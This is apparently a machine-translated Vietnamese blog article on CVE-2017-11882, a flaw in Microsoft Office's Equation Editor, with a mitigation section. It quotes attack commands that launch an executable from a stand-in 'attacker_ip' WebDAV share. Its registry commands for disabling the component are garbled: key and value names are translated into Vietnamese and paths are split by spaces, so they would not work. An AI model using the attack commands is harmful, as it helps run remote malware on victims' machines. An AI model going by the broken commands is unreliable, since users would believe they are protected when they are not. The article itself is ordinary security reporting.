Search

Nhập từ khóa tìm kiếm của bạn và nhấn enter

Liên Hệ

Name

Email *

Message *

Khuyết điểm của MS Office năm 2017 Cho phép Hacker cài đặt phần mềm độc hại mà không có sự tương tác của người dùng



Bạn nên cẩn thận khi mở các tệp trong MS Office.
Khi thế giới vẫn đang đối mặt với nguy cơ " tính năng DDE" tích hợp sẵn của Microsoft Office , các nhà nghiên cứu đã phát hiện ra một vấn đề nghiêm trọng với một thành phần Office khác, có thể cho phép kẻ tấn công cài đặt phần mềm độc hại từ xa trên các máy tính mục tiêu.

Lỗ hổng này là một vấn đề về tham nhũng bộ nhớ, nó nằm trong tất cả các phiên bản của Microsoft Office được phát hành trong 17 năm qua, bao gồm Microsoft Office 365, và hoạt động với tất cả các phiên bản hệ điều hành Windows, bao gồm bản cập nhật mới nhất của Microsoft Windows 10 Creators Update.

Được phát hiện bởi các nhà nghiên cứu bảo mật tại Embedi , lỗ hổng dẫn đến việc thực hiện mã từ xa, cho phép một kẻ tấn công từ xa không được thẩm định và thực hiện mã độc hại trên một hệ thống đích mà không cần tương tác người dùng sau khi mở một tài liệu độc hại. Lỗ
hổng, được xác định là  CVE-2017-11882 , nằm trong EQNEDT32.EXE, một thành phần của MS Office chịu trách nhiệm chèn và chỉnh sửa các phương trình (các đối tượng OLE) trong các tài liệu.
Tuy nhiên, do hoạt động của bộ nhớ không đúng, thành phần này không xử lý đúng đối tượng trong bộ nhớ, làm hỏng nó theo cách mà kẻ tấn công có thể thực thi mã độc hại trong bối cảnh người dùng đăng nhập.
Mười bảy năm về trước, EQNEDT32.EXE đã được giới thiệu trong Microsoft Office 2000 và đã được lưu giữ trong tất cả các phiên bản được phát hành sau khi Microsoft Office 2007 để đảm bảo phần mềm vẫn tương thích với các tài liệu của các phiên bản cũ hơn.


DEMO: Khai thác Cho phép Toàn hệ thống Take Over




Khai thác lỗ hổng này đòi hỏi phải mở một tệp tin độc hại được tạo ra đặc biệt với một phiên bản Microsoft Office hoặc Microsoft WordPad bị ảnh hưởng.

Lỗ hổng này có thể bị khai thác để kiểm soát hoàn toàn một hệ thống khi kết hợp với các khai thác leo thang đặc quyền Windows Kernel (như CVE-2017-11847).

Có thể tấn công kịch bản:

Trong khi giải thích phạm vi của lỗ hổng, các nhà nghiên cứu của Embedi đề xuất một số kịch bản tấn công được liệt kê dưới đây:
"Bằng cách chèn một số OLE khai thác lỗ hổng được mô tả, có thể thực hiện một chuỗi các lệnh tùy ý (ví dụ như tải một tập tin tùy ý từ Internet và thực hiện nó). "

"Một trong những cách đơn giản nhất để thực thi mã tùy ý là khởi chạy một tệp thực thi từ máy chủ WebDAV do kẻ tấn công kiểm soát."

Tuy nhiên, một kẻ tấn công có thể sử dụng lỗ hổng được mô tả để thực hiện các lệnh như cmd.exe / c start \\ attacker_ip \ ff.Loại lệnh này có thể được sử dụng như một phần của khai thác và kích hoạt bắt đầu WebClient. "

"Sau đó, một kẻ tấn công có thể bắt đầu một tập tin thực thi từ máy chủ WebDAV bằng cách sử dụng lệnh \\ attacker_ip \ ff \ 1.exe Cơ chế bắt đầu của một tập tin thực thi tương tự như của \\ live.sysinternals.com \ dịch vụ công cụ ".

Bảo vệ chống lại Microsoft Office Vulnerability
Với bản phát hành Bản phát hành tháng này , Microsoft đã giải quyết lỗ hổng này bằng cách thay đổi cách phần mềm bị ảnh hưởng xử lý các đối tượng trong bộ nhớ.

Vì vậy, người dùng được khuyến khích áp dụng bản vá lỗi bảo mật vào tháng 11 càng sớm càng tốt để giữ cho tin tặc và bọn tội phạm không có quyền kiểm soát máy tính của họ.

Vì thành phần này có một số vấn đề về bảo mật có thể dễ dàng bị khai thác, vô hiệu hóa nó có thể là cách tốt nhất để đảm bảo an ninh hệ thống của bạn.

Người dùng có thể chạy lệnh sau trong dấu nhắc lệnh để vô hiệu hoá đăng ký của thành phần trong sổ đăng ký Windows:

reg add "HKLM \ SOFTWARE \ Microsoft \ Office \ Common \ COM Khả năng tương thích \ {0002CE02-0000-0000-C000-000000000046}" / v "cờ hiệu suất tương thích" / t REG_DWORD / d 0x400

Đối với gói Microsoft Office 32-bit trong hệ điều hành x64, hãy chạy lệnh sau:

reg add "HKLM \ SOFTWARE \ Wow6432Node \ Microsoft \ Office \ Common \ COM Khả năng tương thích \ {0002CE02-0000-0000-C000-000000000046}" / v "cờ hiệu suất tương thích" / t REG_DWORD / d 0x400


Bên cạnh đó, người dùng cũng nên kích hoạt tính năng Protected View (hộp cát Microsoft Office) để ngăn chặn việc thực hiện nội dung hoạt động (OLE / ActiveX / Macro).


0 nhận xét:

Post a Comment